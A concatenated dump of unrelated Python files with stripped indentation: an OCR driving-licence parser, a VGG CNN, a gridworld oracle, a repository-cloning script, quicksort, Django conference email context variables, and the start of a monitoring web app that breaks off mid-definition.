def __init__(self, a, fmt=r'.*?'):
super(OcrModel.TextAfter, self).__init__(
re.compile(
r'(?<={})\s*{}'.format(a, fmt),
re.UNICODE,
),
)
class TextBetween(BaseText):
def __init__(self, a, b, fmt=r'.*?'):
super(OcrModel.TextBetween, self).__init__(
re.compile(
r'(?<={}){}(?={})'.format(a, fmt, b),
re.UNICODE | re.DOTALL,
),
)
class StringField(TextBetween):
def __init__(self, a, b):
super(OcrModel.StringField, self).__init__(
r'\n{}[\.,]'.format(a),
r'\n{}[\.,]'.format(b),
)
class DateField(TextAfter):
def __init__(self, a):
super(OcrModel.DateField, self).__init__(
r'\n{}[\.,]'.format(a),
r'\d{2}[\.-]\d{2}[\.-](\d{2}|\d{4})\b',
)
def search(self, text):
value = super(OcrModel.DateField, self).search(text)
try:
value = dateutil.parser.parse(
value,
dayfirst=True,
)
value = value.strftime('%d.%m.%Y')
except (
TypeError,
ValueError,
):
value = None
return value
def __init__(self, text):
logging.debug(text)
for name in dir(self.__class__):
attr = getattr(self.__class__, name)
if isinstance(attr, OcrModel.BaseText):
setattr(self, name, attr.search(text))
class DrivingLicence(OcrModel):
TITLES = (
u'MISS ',
u'MR ',
u'MRS ',
u'MS ',
)
lastname = OcrModel.StringField('1', '2')
firstname = OcrModel.StringField('2', '3')
middlename = None
title = None
birthdate = OcrModel.DateField('3')
issued = OcrModel.DateField('4a')
expiry = OcrModel.DateField('4b')
issued_by = OcrModel.TextBetween(
r'\b4c[\.,]',
r'\n',
r'[\w ]+',
)
number = OcrModel.TextBetween(
r'\b5[\.,]',
r'\n',
r'[\w\- ]+',
)
number_uk = OcrModel.TextBetween(
r'\b',
r' \d{2}\n',
r' *([A-Z9] ?){5}\d ?([05] ?[1-9]|[16] ?[012]) ?(0 ?[1-9]|[12] ?\d|3 ?[01]) ?\d ?([A-Z9] ?){2}\d ?([A-Z] ?){2}(\d ?){0,2}',
)
address = OcrModel.StringField('8', '9')
category = OcrModel.TextBetween(
'\n9[\.,]',
'\n',
)
city = None
postal_code = None
def __init__(self, source=None, content=None):
if source:
image = {
'source': {
'gcsImageUri': source,
}
}
else:
image = {
'content': base64.b64encode(content),
}
access_token = app_identity.get_access_token(
scopes=(
'https://www.googleapis.com/auth/cloud-platform',
'https://www.googleapis.com/auth/cloud-vision',
),
)[0]
response = urlfetch.fetch(
'https://vision.googleapis.com/v1p2beta1/images:annotate',
method='POST',
payload=json.dumps({
'requests': [
{
'image': image,
'features': [
{
'type': 'TEXT_DETECTION',
},
],
'imageContext': {},
}
]
}),
headers={
'Authorization': 'Bearer {}'.format(access_token),
'Content-Type': 'application/json',
}
)
response = json.loads(response.content)
try:
source = response['responses'][0]['textAnnotations'][0]['description']
except LookupError:
source = ''
super(DrivingLicence, self).__init__(source)
if self.firstname:
self.firstname = self.firstname.replace('\n', ' ')
for title in self.TITLES:
if self.firstname.startswith(title):
self.firstname = self.firstname.replace(title, u'')
self.title = title.rstrip(' ')
break
try:
self.firstname, self.middlename = self.firstname.split(
' ',
1,
)
except ValueError:
pass
if self.number_uk:
self.number = self.number_uk
if self.number:
self.number = self.number.replace(' ', '')
if self.address:
try:
self.address, self.city, self.postal_code = self.address.rsplit(', ', 2)
except ValueError:
pass
|
import pickle as cPickle
from parameters import CNN_Parameter, Or_Parameter
import tensorflow as tf
good_par = Or_Parameter(verbose=False)
cnn_param = CNN_Parameter(verbose=False)
class ConvNet():
def p(self, t):
print(t.name, t.get_shape())
def ld_vgg_wts(self):
with open(good_par.vgg_weights, "rb") as f:
self.pretrained_weights = cPickle.load(f, fix_imports=True, errors="strict")
def cnn_build(self, image):
image = self.img_cnvrsn_scaling(image)
conv1_1 = self.conv_dep(image, "conv1_1", nonlinearity=tf.nn.relu)
conv1_2 = self.conv_dep(conv1_1, "conv1_2", nonlinearity=tf.nn.relu)
pool1 = tf.nn.max_pool2d(conv1_2, ksize=cnn_param.pool_window,strides=cnn_param.pool_stride, padding='SAME', name='pool1')
conv2_1 = self.conv_dep(pool1, "conv2_1", nonlinearity=tf.nn.relu)
conv2_2 = self.conv_dep(conv2_1, "conv2_2", nonlinearity=tf.nn.relu)
pool2 = tf.nn.max_pool2d(conv2_2, ksize=cnn_param.pool_window,strides=cnn_param.pool_stride, padding='SAME', name='pool2')
conv3_1 = self.conv_dep(pool2, "conv3_1", nonlinearity=tf.nn.relu)
conv3_2 = self.conv_dep(conv3_1, "conv3_2", nonlinearity=tf.nn.relu)
conv3_3 = self.conv_dep(conv3_2, "conv3_3", nonlinearity=tf.nn.relu)
pool3 = tf.nn.max_pool2d(conv3_3, ksize=cnn_param.pool_window,strides=cnn_param.pool_stride, padding='SAME', name='pool3')
conv4_1 = self.conv_dep(pool3, "conv4_1", nonlinearity=tf.nn.relu)
conv4_2 = self.conv_dep(conv4_1, "conv4_2", nonlinearity=tf.nn.relu)
conv4_3 = self.conv_dep(conv4_2, "conv4_3", nonlinearity=tf.nn.relu)
pool4 = tf.nn.max_pool2d(conv4_3, ksize=cnn_param.pool_window,strides=cnn_param.pool_stride, padding='SAME', name='pool4')
conv5_1 = self.conv_dep(pool4, "conv5_1", nonlinearity=tf.nn.relu)
conv5_2 = self.conv_dep(conv5_1, "conv5_2", nonlinearity=tf.nn.relu)
conv5_3 = self.conv_dep(conv5_2, "conv5_3", nonlinearity=tf.nn.relu)
conv_depth_1 = self.conv_dep(conv5_3, "conv6_1")
conv_depth = self.conv_dep(conv_depth_1, "depth")
last_cnn = self.conv_dep(conv_depth, "conv6")
space = tf.reduce_mean(last_cnn, [1, 2])
with tf.compat.v1.variable_scope("GAP"):
space_w = tf.compat.v1.get_variable("W", shape=cnn_param.layer_shapes['GAP/W'],
initializer=tf.random_normal_initializer(stddev=good_par.std_dev))
P_cls = tf.matmul(space, space_w)
return last_cnn, space, P_cls
def get_binary(self, tf_cls, last_cnn):
with tf.compat.v1.variable_scope("GAP", reuse=True):
class_w = tf.gather(tf.transpose(tf.compat.v1.get_variable("W")), tf_cls)
class_w = tf.reshape(class_w, [-1, cnn_param.last_features, 1])
last_cnn1 = tf.compat.v1.image.resize_bilinear(last_cnn, [good_par.image_h, good_par.image_w])
last_cnn1 = tf.reshape(last_cnn1, [-1, good_par.image_h * good_par.image_w, cnn_param.last_features])
binary_map = tf.reshape(tf.matmul(last_cnn1, class_w), [-1, good_par.image_h, good_par.image_w])
return binary_map
def get_vgg_wts(self, layer_name, bias=False):
layer = self.pretrained_weights[layer_name]
if bias: return layer[1]
return layer[0].transpose((2, 3, 1, 0))
def conv_dep(self, input_, name, nonlinearity=None):
with tf.compat.v1.variable_scope(name) as scope:
W_shape = cnn_param.layer_shapes[name + '/W']
b_shape = cnn_param.layer_shapes[name + '/b']
if good_par.fine_tuning and name not in ['conv6', 'conv6_1', 'depth']:
W = self.get_vgg_wts(name)
b = self.get_vgg_wts(name, bias=True)
W_initializer = tf.constant_initializer(W)
b_initializer = tf.constant_initializer(b)
else:
W_initializer = tf.truncated_normal_initializer(stddev=good_par.std_dev)
b_initializer = tf.constant_initializer(0.0)
conv_wts = tf.compat.v1.get_variable("W", shape=W_shape, initializer=W_initializer)
conv_bias = tf.compat.v1.get_variable("b", shape=b_shape, initializer=b_initializer)
if name == 'depth':
conv = tf.compat.v1.nn.depthwise_conv2d_native(input_, conv_wts, [1, 1, 1, 1], padding='SAME')
else:
conv = tf.nn.conv2d(input_, conv_wts, [1, 1, 1, 1], padding='SAME')
bias = tf.nn.bias_add(conv, conv_bias)
bias = tf.nn.dropout(bias, 0.7)
if nonlinearity is None:
return bias
return nonlinearity(bias, name=name)
def img_cnvrsn_scaling(self, image):
image = image*255.
r, g, b = tf.split(image, 3, 3)
VGG_MEAN = [103.939, 116.779, 123.68]
return tf.concat([b - VGG_MEAN[0], g - VGG_MEAN[1], r - VGG_MEAN[2]], 3)
|
import numpy as np
from visgrid.gridworld import skills
class DistanceOracle:
def __init__(self, env):
self.env = env
states = np.indices((env._rows, env._cols)).T.reshape(-1, 2)
for s in states:
for sp in states:
# Pre-compute all pairwise distances
skills.GoToGridPosition(env, s, sp)
def pairwise_distances(self, indices, s0, s1):
init_states = s0[indices]
next_states = s1[indices]
distances = [
skills.GoToGridPosition(self.env, s, sp)[1] for s, sp in zip(init_states, next_states)
]
return distances
#%%
if __name__ == '__main__':
import seeding
import numpy as np
import random
from visgrid.gridworld import GridWorld, MazeWorld, SpiralWorld
from visgrid.gridworld import grid
import matplotlib.pyplot as plt
grid.directions[3]
seeding.seed(0, np, random)
env = SpiralWorld(rows=6, cols=6)
env.plot()
oracle = DistanceOracle(env)
distances = [v[-1] for k, v in env.saved_directions.items()]
plt.hist(distances, bins=36)
plt.show()
|
import os
STUDENT_REPOSITORIES = [
"https://github.com/KurtDankovich/360-kurt-dankovich.git",
"https://github.com/BryanGabe00/360-bryan-gabe",
"https://github.com/RichGol/360-richard-goluszka",
"https://github.com/mcclint50/360-colin-mcclintic.git",
"https://github.com/JuanMoncada23/360-juan-moncada.git",
"https://github.com/BrennanP01/360-brennan-price.git",
"https://github.com/mrodriguezdelcorral/360-Maria-Rodriguez.git"
]
SPRINT_3_TEAM_REPOSITORIES = [
"https://github.com/mcclint50/360-Mongooses.git",
"https://github.com/BrennanP01/360-gloriousKenobis.git",
"https://github.com/JuanMoncada23/360-RedDragons.git"
]
SPRINT_4_TEAM_REPOSITORIES = [
"https://github.com/mcclint50/360-Mongooses.git", # Mongooses (1)
"https://github.com/BryanGabe00/QuizMaster.git", # RedDragons
"https://github.com/BrennanP01/360-gloriousKenobis.git" # GloriousKenobis (3)
]
def printAndSystemExecute(executeString):
print('Executing: ' + executeString)
os.system(executeString)
def clone(repositoryLink):
printAndSystemExecute("git clone %s" % repositoryLink)
def update(directoryName):
os.chdir(directoryName)
printAndSystemExecute("git pull")
os.chdir("..")
def cloneOrUpdate(repositoryLink):
# Split the path name so that we have the local directory name.
# https://github.com/KurtDankovich/360-kurt-dankovich.git -> 360-kurt-dankovich
substrings = repositoryLink.split("/")
substrings = substrings[len(substrings)-1].split(".")
directoryName = substrings[0]
isDir = os.path.isdir(directoryName)
if isDir:
print("Update %s" % repositoryLink)
update(directoryName)
else:
print("Clone %s" % repositoryLink)
clone(repositoryLink)
print("")
os.system("clear")
print("Cloning or Updating Student Repositories:\n")
for repositoryLink in STUDENT_REPOSITORIES:
cloneOrUpdate(repositoryLink)
print("Cloning or Updating Sprint 3 Team Repositories:\n")
for repositoryLink in SPRINT_3_TEAM_REPOSITORIES:
cloneOrUpdate(repositoryLink)
print("Cloning or Updating Sprint 4 Team Repositories:\n")
for repositoryLink in SPRINT_4_TEAM_REPOSITORIES:
cloneOrUpdate(repositoryLink)
|
"""
quick sort algorithm adapted from Wikipedia page
@author Axel Ancona Esselmann
"""
class QuickSort():
def sort(self, A):
self._quicksort(A,0,len(A) - 1);
def _quicksort(self, A, lo, hi):
if lo < hi:
p = self._partition(A, lo, hi);
self._quicksort(A, lo, p - 1);
self._quicksort(A, p + 1, hi);
def _partition(self, A, lo, hi):
pivot = A[hi];
i = lo;
for j in xrange(lo,hi):
if A[j] <= pivot:
temp = A[i];
A[i] = A[j];
A[j] = temp;
i += 1;
temp = A[i];
A[i] = A[hi];
A[hi] = temp;
return i; |
from django.conf import settings
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
from collections import namedtuple
from markdown import markdown
from chair_mail.utility import get_absolute_url, markdownify_link, \
markdownify_list
from review.models import Review
from submissions.models import Submission
Var = namedtuple('Var', ('name', 'description'))
#
# FRAME CONTEXT (DO NOT USE IT IN GROUP MESSAGE RENDERING!!!)
#
FRAME_SUBJECT = Var('subject', _('subject defined when writing a new letter'))
FRAME_BODY = Var('body', _('body of the letter'))
FRAME_SITE_URL = Var('site_url', _('link to the registration system site'))
FRAME_CONF_EMAIL = Var('conf_email', _('email for contacting organizers'))
FRAME_CONF_SITE_URL = Var('conf_site_url', _('URL of the conference web site'))
FRAME_CONF_FULL_NAME = Var('conf_full_name', _('full name of the conference'))
FRAME_CONF_SHORT_NAME = Var('conf_short_name', _('short name of the conference'))
FRAME_CONF_LOGO_URL = Var(
'conf_logo_url',
_('URL of the conference logotype. Note, that it better should be located '
'at some well-known source (like Google Drive or Amazon S3), since some '
'email clients may cut images from suspicious sources.'))
FRAME_VARS = tuple((var.name, var.description) for var in (
FRAME_SUBJECT, FRAME_BODY, FRAME_SITE_URL, FRAME_CONF_EMAIL,
FRAME_CONF_SITE_URL, FRAME_CONF_FULL_NAME, FRAME_CONF_SHORT_NAME,
FRAME_CONF_LOGO_URL
))
def get_frame_context(conference, subject, body):
"""Build frame context. It differs from GroupMessage rendering since
frame is separately defined in HTML and plain-text: we don't need
to enclose references in Markdown or HTML.
"""
return {
FRAME_SUBJECT.name: subject,
FRAME_BODY.name: body,
FRAME_SITE_URL.name:
f'{settings.SITE_PROTOCOL}://{settings.SITE_DOMAIN}',
FRAME_CONF_EMAIL.name: conference.contact_email,
FRAME_CONF_SITE_URL.name: conference.site_url,
FRAME_CONF_FULL_NAME.name: conference.full_name,
FRAME_CONF_SHORT_NAME.name: conference.short_name,
FRAME_CONF_LOGO_URL.name:
conference.logotype.url if conference.logotype else ''
}
#
# CONFERENCE CONTEXT
#
CONF_SHORT_NAME = Var('conf_short_name', _('short name of the conference'))
CONF_FULL_NAME = Var('conf_full_name', _('full name of the conference'))
CONF_START_DATE = Var('conf_start_date', _('conference start date'))
CONF_END_DATE = Var('conf_end_date', _('conference end date'))
CONF_SITE_URL = Var('conf_site_url', _('conference site URL'))
CONF_EMAIL = Var('conf_email', _('email of the organizing committee'))
SUBMISSION_END_DATETIME = Var('sub_end_date', _('end of submission datetime'))
REVIEW_END_DATETIME = Var('rev_end_date', _('end of review datetime'))
CONFERENCE_VARS = tuple((var.name, var.description) for var in (
CONF_SHORT_NAME, CONF_FULL_NAME, CONF_START_DATE, CONF_END_DATE,
CONF_SITE_URL, CONF_EMAIL, SUBMISSION_END_DATETIME, REVIEW_END_DATETIME,
))
def get_conference_context(conference):
return {
CONF_SHORT_NAME.name: conference.short_name,
CONF_FULL_NAME.name: conference.full_name,
CONF_START_DATE.name: conference.start_date,
CONF_END_DATE.name: conference.close_date,
CONF_SITE_URL.name: markdownify_link(conference.site_url),
CONF_EMAIL.name: markdownify_link(conference.contact_email, 'mailto:'),
SUBMISSION_END_DATETIME.name: conference.submission_stage.end_date,
REVIEW_END_DATETIME.name: conference.review_stage.end_date,
}
#
# USER CONTEXT
#
# - user profile context:
#
USERNAME = Var('username', _('user full name in English'))
FIRST_NAME = Var('first_name', _('user first name in English'))
LAST_NAME = Var('last_name', _('user last name in English'))
USER_ID = Var('user_id', _('user ID'))
USER_PROFILE_VARS = tuple((var.name, var.description) for var in (
USERNAME, FIRST_NAME, LAST_NAME, USER_ID
))
def _get_user_profile_context(user):
"""Get context dictionary regarding user profile.
"""
profile = user.profile
return {
USERNAME.name: profile.get_full_name(),
FIRST_NAME.name: profile.first_name,
LAST_NAME.name: profile.last_name,
USER_ID.name: user.pk
}
#
# - user submissions context:
#
NUM_PAPERS = Var('num_papers', _('number of papers authored by the user'))
PAPERS_LIST = Var('papers_list', _('list of all papers authored by the user'))
NUM_SUBMITTED_PAPERS = Var(
'num_submitted_papers',
_('number of papers in "submitted" phase')
)
SUBMITTED_PAPERS_LIST = Var(
'submitted_papers_list',
_('list of all papers in "submitted" phase')
)
NUM_INCOMPLETE_SUBMITTED_PAPERS = Var(
'num_incomplete_submitted_papers',
_('number of partially filled papers in "submitted" phase')
)
INCOMPLETE_SUBMITTED_PAPERS_LIST = Var(
'incomplete_submitted_papers_list',
_('list of partially filled papers in "submitted" phase')
)
NUM_COMPLETE_SUBMITTED_PAPERS = Var(
'num_complete_submitted_papers',
_('number of completely filled papers in "submitted" phase')
)
COMPLETE_SUBMITTED_PAPERS_LIST = Var(
'complete_submitted_papers_list',
_('list of completely filled papers in "submitted" phase'))
NUM_EMPTY_PAPERS = Var(
'num_empty_papers',
_('number of papers without even title')
)
EMPTY_PAPERS_LIST = Var(
'empty_papers_list',
_('list of papers without even title')
)
NUM_UNDER_REVIEW_PAPERS = Var(
'num_under_review_papers',
_('number of papers authored by the user being under review')
)
UNDER_REVIEW_PAPERS_LIST = Var(
'under_review_papers_list',
_('list of papers authored by the user being under review')
)
USER_SUBMISSIONS_VARS = tuple((var.name, var.description) for var in (
NUM_PAPERS, PAPERS_LIST, NUM_SUBMITTED_PAPERS, SUBMITTED_PAPERS_LIST,
NUM_INCOMPLETE_SUBMITTED_PAPERS, INCOMPLETE_SUBMITTED_PAPERS_LIST,
NUM_COMPLETE_SUBMITTED_PAPERS, COMPLETE_SUBMITTED_PAPERS_LIST,
NUM_EMPTY_PAPERS, EMPTY_PAPERS_LIST,
NUM_UNDER_REVIEW_PAPERS, UNDER_REVIEW_PAPERS_LIST,
))
def _get_user_submissions_context(user, conference):
"""Get context dictionary regarding user submissions.
"""
# TODO: add context for accepted and rejected papers
papers = (Submission.objects
.filter(conference=conference)
.filter(authors__user=user))
complete_ids = [p.pk for p in papers if not p.warnings()]
_submitted = papers.filter(status=Submission.SUBMITTED)
under_review = papers.filter(status=Submission.UNDER_REVIEW)
submitted = {
'all': _submitted,
'complete': _submitted.filter(pk__in=complete_ids),
'incomplete': _submitted.exclude(pk__in=complete_ids),
'empty': _submitted.filter(title='')
}
# Helper to build markdown representation of the queryset:
def get_displayed_title(submission):
title = submission.title
if not title:
return f'*no title*'
return f'{title}'
def ul(query, default_value=''):
return markdownify_list(
query,
get_item_value=get_displayed_title,
get_item_url=lambda sub: get_absolute_url(
reverse('submissions:overview', kwargs={'pk': sub.pk})),
default_value='no name',
)
return {
NUM_PAPERS.name: papers.count(),
PAPERS_LIST.name: ul(papers),
NUM_SUBMITTED_PAPERS.name: submitted['all'].count(),
SUBMITTED_PAPERS_LIST.name: ul(submitted['all']),
NUM_COMPLETE_SUBMITTED_PAPERS.name: submitted['complete'].count(),
COMPLETE_SUBMITTED_PAPERS_LIST.name:ul(submitted['complete']),
NUM_INCOMPLETE_SUBMITTED_PAPERS.name: submitted['incomplete'].count(),
INCOMPLETE_SUBMITTED_PAPERS_LIST.name: ul(submitted['incomplete']),
NUM_EMPTY_PAPERS.name: submitted['empty'].count(),
EMPTY_PAPERS_LIST.name: ul(submitted['empty']),
NUM_UNDER_REVIEW_PAPERS.name: under_review.count(),
UNDER_REVIEW_PAPERS_LIST.name: ul(under_review)
}
#
# - user reviews context:
#
NUM_REVIEWS = Var('num_reviews', _('number of reviews assigned to this user'))
REVIEWS_LIST = Var('reviews_list', _('list of reviews assigned to this user'))
NUM_COMPLETE_REVIEWS = Var(
'num_complete_reviews',
_('number of completed reviews assigned to this user')
)
COMPLETE_REVIEWS_LIST = Var(
'complete_reviews_list',
_('list of completed reviews assigned to this user'),
)
NUM_INCOMPLETE_REVIEWS = Var(
'num_incomplete_reviews',
_('number of reviews to be finished'),
)
INCOMPLETE_REVIEWS_LIST = Var(
'incomplete_reviews_list',
_('list of reviews to be finished')
)
USER_REVIEWS_VARS = tuple((var.name, var.description) for var in (
NUM_REVIEWS, REVIEWS_LIST, NUM_COMPLETE_REVIEWS, COMPLETE_REVIEWS_LIST,
NUM_INCOMPLETE_REVIEWS, INCOMPLETE_REVIEWS_LIST
))
def _get_user_review_context(user, conference):
"""Get context dictionary regarding user reviews.
"""
reviews = (Review.objects
.filter(stage__submission__conference=conference)
.filter(reviewer__user=user))
complete_reviews_ids = [rev.pk for rev in reviews if not rev.warnings()]
complete_reviews = reviews.filter(pk__in=complete_reviews_ids)
incomplete_reviews = reviews.exclude(pk__in=complete_reviews_ids)
# Helper to build <ul>-representation of the queryset:
def ul(query):
return markdownify_list(
query,
get_item_value=lambda rev: rev.paper.title,
get_item_url=lambda rev: get_absolute_url(
reverse('review:review-details', kwargs={'pk': rev.pk}))
)
return {
NUM_REVIEWS.name: reviews.count(),
REVIEWS_LIST.name: ul(reviews),
NUM_COMPLETE_REVIEWS.name: complete_reviews.count(),
COMPLETE_REVIEWS_LIST.name: ul(complete_reviews),
NUM_INCOMPLETE_REVIEWS.name: incomplete_reviews.count(),
INCOMPLETE_REVIEWS_LIST.name: ul(incomplete_reviews),
}
#
# ---- BUILDING USER CONTEXT AND VARS ----
#
def get_user_context(user, conference):
return {
**_get_user_profile_context(user),
**_get_user_submissions_context(user, conference),
**_get_user_review_context(user, conference),
}
USER_VARS = USER_PROFILE_VARS + USER_SUBMISSIONS_VARS + USER_REVIEWS_VARS
#
# SUBMISSION CONTEXT
#
SUB_ID = Var('paper_id', _('submission ID'))
SUB_TITLE = Var('paper_title', _('paper title'))
SUB_ABSTRACT = Var('paper_abstract', _('paper abstract'))
SUB_AUTHORS = Var('paper_authors', _('paper authors string'))
SUB_URL = Var('paper_url', _('URL of the paper'))
# TODO: add variables for review results
SUB_REVIEW_SCORE = Var('paper_review_score', _('Paper average score'))
SUB_REVIEWS_LIST = Var('paper_reviews_list', _('List of reviews with scores'))
SUB_REVIEW_DECISION = Var('paper_review_decision', _('Review decision'))
SUB_PROCEEDINGS_LIST = Var('paper_proceedings',
_('Proceedings for accepted papers'))
SUBMISSION_VARS = tuple((var.name, var.description) for var in (
SUB_ID, SUB_TITLE, SUB_ABSTRACT, SUB_AUTHORS, SUB_URL,
SUB_REVIEW_SCORE, SUB_REVIEWS_LIST, SUB_PROCEEDINGS_LIST,
))
def get_submission_context(submission):
stage = submission.reviewstage_set.first()
reviews = []
decision_type = None
if stage:
reviews = list(stage.review_set.filter(submitted=True))
decision_type = stage.decision.decision_type if stage.decision else None
review_lines = []
for n, r in enumerate(reviews):
scores = [
f'Technical merit: **{r.technical_merit}**',
f'originality: **{r.originality}**',
f'relevance: **{r.relevance}**',
f'clarity: **{r.clarity}**'
]
review_lines.append(
f'**Review #{n + 1}**: {", ".join(scores)}\n\n'
f'{r.details}')
proceedings = []
for camera in submission.cameraready_set.all():
proc_type, volume = camera.proc_type, camera.volume
if camera.active and proc_type:
vol_str = f', {volume.name}' if volume else ''
proceedings.append(f'{proc_type.name}{vol_str}')
return {
SUB_ID.name: submission.pk,
SUB_TITLE.name: submission.title,
SUB_ABSTRACT.name: submission.abstract,
SUB_AUTHORS.name: submission.get_authors_display(),
SUB_URL.name: markdownify_link(get_absolute_url(
reverse('submissions:overview', kwargs={'pk': submission.pk}))),
SUB_REVIEW_SCORE.name:
'-' if not stage or not stage.score else stage.score,
SUB_REVIEWS_LIST.name: '\n\n'.join(review_lines),
SUB_REVIEW_DECISION.name:
decision_type.description if decision_type else '',
SUB_PROCEEDINGS_LIST.name: '\n-'.join(proceedings)
}
|
from xml.etree import ElementTree
from time import time
from glob import glob
#import multiprocessing
import eventlet.green.subprocess as subprocess
import socket
import os.path
import sys
import os
import simplejson as json
import logging
import clustohttp
import eventlet
import memcache
import bottle
import jinja2
redis = eventlet.import_patched('redis')
STATIC_PATH = '/usr/share/metartg/static'
TEMPLATE_PATH = '/usr/share/metartg/templates'
bottle.debug(True)
application = bottle.default_app()
env = jinja2.Environment(loader=jinja2.FileSystemLoader(TEMPLATE_PATH))
cache = memcache.Client(['127.0.0.1:11211'])
gpool = eventlet.GreenPool(200)
clusto = clustohttp.ClustoProxy('http://clusto.simplegeo.com/api')
#rrdqueue = eventlet.Queue()
db = redis.Redis()
class RedisQueue(object):
def __init__(self, key):
self.key = key
def put(self, obj):
db.lpush(self.key, json.dumps(obj))
def get(self):
return json.loads(db.brpop(self.key)[1])
def qsize(self):
return db.llen(self.key)
rrdqueue = RedisQueue('rrdqueue')
RRDPATH = '%(host)s/%(service)s/%(metric)s.rrd'
RRD_GRAPH_DEFS = {
'system-memory': [
'DEF:free=%(rrdpath)s/memory/free_memory.rrd:sum:AVERAGE',
'DEF:total=%(rrdpath)s/memory/total_memory.rrd:sum:AVERAGE',
'DEF:buffers=%(rrdpath)s/memory/buffer_memory.rrd:sum:AVERAGE',
'DEF:active=%(rrdpath)s/memory/active_memory.rrd:sum:AVERAGE',
'DEF:inactive=%(rrdpath)s/memory/inactive_memory.rrd:sum:AVERAGE',
'CDEF:bytes_free=free,1024,*',
'CDEF:bytes_total=total,1024,*',
'CDEF:bytes_buffers=buffers,1024,*',
'CDEF:bytes_active=active,1024,*',
'CDEF:bytes_inactive=inactive,1024,*',
'AREA:bytes_active#FF0000:Active memory\\l:STACK',
'AREA:bytes_buffers#FFFC38:Buffer memory\\l:STACK',
'AREA:bytes_inactive#700000:Inactive memory\\l:STACK',
'LINE:bytes_total#FFFFFF:Total memory\\l',
],
'network-bytes': [
'DEF:rx_bytes=%(rrdpath)s/network/eth0_rx_bytes.rrd:sum:AVERAGE',
'DEF:tx_bytes=%(rrdpath)s/network/eth0_tx_bytes.rrd:sum:AVERAGE',
'LINE:rx_bytes#006699:rx bytes\\l',
'LINE:tx_bytes#996600:tx bytes\\l',
],
'network-packets': [
'DEF:rx_packets=%(rrdpath)s/network/eth0_rx_packets.rrd:sum:AVERAGE',
'DEF:tx_packets=%(rrdpath)s/network/eth0_tx_packets.rrd:sum:AVERAGE',
'LINE:rx_packets#006699:rx packets\\l',
'LINE:tx_packets#996600:tx packets\\l',
],
'system-cpu': [
'DEF:cpu_user=%(rrdpath)s/cpu/user.rrd:sum:AVERAGE',
'DEF:cpu_system=%(rrdpath)s/cpu/sys.rrd:sum:AVERAGE',
'DEF:cpu_nice=%(rrdpath)s/cpu/nice.rrd:sum:AVERAGE',
'DEF:cpu_iowait=%(rrdpath)s/cpu/iowait.rrd:sum:AVERAGE',
'DEF:cpu_steal=%(rrdpath)s/cpu/steal.rrd:sum:AVERAGE',
'AREA:cpu_system#FF6600:CPU system\\l:STACK',
'AREA:cpu_nice#FFCC00:CPU nice\\l:STACK',
'AREA:cpu_user#FFFF66:CPU user\\l:STACK',
'AREA:cpu_iowait#FF5555:CPU iowait\\l:STACK',
'AREA:cpu_steal#EA8F00FF:CPU steal\\l:STACK',
],
'sar-io': [
'DEF:iowait=%(rrdpath)s/sar-cpu/iowait.rrd:sum:AVERAGE',
'DEF:iowait_x=%(rrdpath)s/sar-cpu/iowait.rrd:sum:AVERAGE',
'DEF:bread_s=%(rrdpath)s/sar-io/bytes_read_sec.rrd:sum:AVERAGE',
'CDEF:cdef_bread_s=bread_s,512,*,1048576,/',
'DEF:bwrit_s=%(rrdpath)s/sar-io/bytes_written_sec.rrd:sum:AVERAGE',
'CDEF:cdef_bwrit_s=bwrit_s,512,*,1048576,/',
'DEF:pswpin_s=%(rrdpath)s/sar-swapping/pages_swapped_in_sec.rrd:sum:AVERAGE',
'DEF:pswpout_s=%(rrdpath)s/sar-swapping/pages_swapped_out_sec.rrd:sum:AVERAGE',
'AREA:iowait#D8ACE0FF:CPU i/o wait\\l',
'LINE1:iowait_x#623465FF:',
'LINE1:cdef_bread_s#EA8F00FF:MB read/s\\l',
'LINE1:cdef_bwrit_s#157419FF:MB written/s\\l',
'LINE1:pswpin_s#4444FFFF:Swap in/s\\l',
'LINE1:pswpout_s#7EE600FF:Swap out/s\\l',
],
'sar-load': [
'DEF:ldavg1=%(rrdpath)s/sar-load/load_avg_1m.rrd:sum:AVERAGE',
'DEF:ldavg5=%(rrdpath)s/sar-load/load_avg_5m.rrd:sum:AVERAGE',
'DEF:ldavg15=%(rrdpath)s/sar-load/load_avg_15m.rrd:sum:AVERAGE',
'AREA:ldavg1#EAAF00FF:1 min load\\l',
'AREA:ldavg5#FF7D00FF:5 min load\\l',
'AREA:ldavg15#942D0CFF:15 min load \\l',
],
'sar-paging-io': [
'DEF:kbpgin_s=%(rrdpath)s/sar-paging/kb_pagein_sec.rrd:sum:AVERAGE',
'CDEF:cdef_kbpgin_s=kbpgin_s,1024,/',
'DEF:kbpgout_s=%(rrdpath)s/sar-paging/kb_pageout_sec.rrd:sum:AVERAGE',
'CDEF:cdef_kbpgout_s=kbpgout_s,1024,/',
'LINE1:cdef_kbpgin_s#EA8F00FF:MB paged in/s',
'LINE1:cdef_kbpgout_s#EA8F00FF:MB paged out/s',
],
'sar-paging-other': [
'DEF:pg_freed_s=%(rrdpath)s/sar-paging/pages_freed_sec.rrd:sum:AVERAGE',
'DEF:pg_scand_s=%(rrdpath)s/sar-paging/pages_scanned_directly_sec.rrd:sum:AVERAGE',
'DEF:pg_scank_s=%(rrdpath)s/sar-paging/pages_scanned_kswapd_sec.rrd:sum:AVERAGE',
'DEF:pg_stolen_s=%(rrdpath)s/sar-paging/pages_stolen_sec.rrd:sum:AVERAGE',
'LINE1:pg_freed_s#ff4444ff:Pages freed',
'LINE1:pg_scand_s#4444FFFF:Pages scanned directly',
'LINE1:pg_scank_s#EA8F00FF:Pages scanned kswapd',
'LINE1:pg_stolen_s#157419FF:Pages stolen',
],
#'io': [
# 'DEF:cpu_wio=%(rrdpath)s/cpu/iowait.rrd:sum:AVERAGE',
# 'LINE:cpu_wio#EA8F00:CPU iowait\\l',
#],
'redis-memory': [
'DEF:memory=%(rrdpath)s/redis/used_memory.rrd:sum:AVERAGE',
'LINE:memory#EA8F00:Redis memory\\l',
],
'redis-connections': [
'DEF:connected_clients=%(rrdpath)s/redis/connected_clients.rrd:sum:AVERAGE',
'DEF:connected_slaves=%(rrdpath)s/redis/connected_slaves.rrd:sum:AVERAGE',
'DEF:blocked_clients=%(rrdpath)s/redis/blocked_clients.rrd:sum:AVERAGE',
'LINE:connected_clients#35962B:Connected clients\\l',
'LINE:connected_slaves#0000FF:Connected slaves\\l',
'LINE:blocked_clients#FF0000:Blocked clients\\l',
],
'elb-requests': [
'DEF:request_count=%(rrdpath)s/elb/request_count.rrd:sum:AVERAGE',
'LINE:request_count#00FF00:Requests per minute\\l',
],
'elb-latency': [
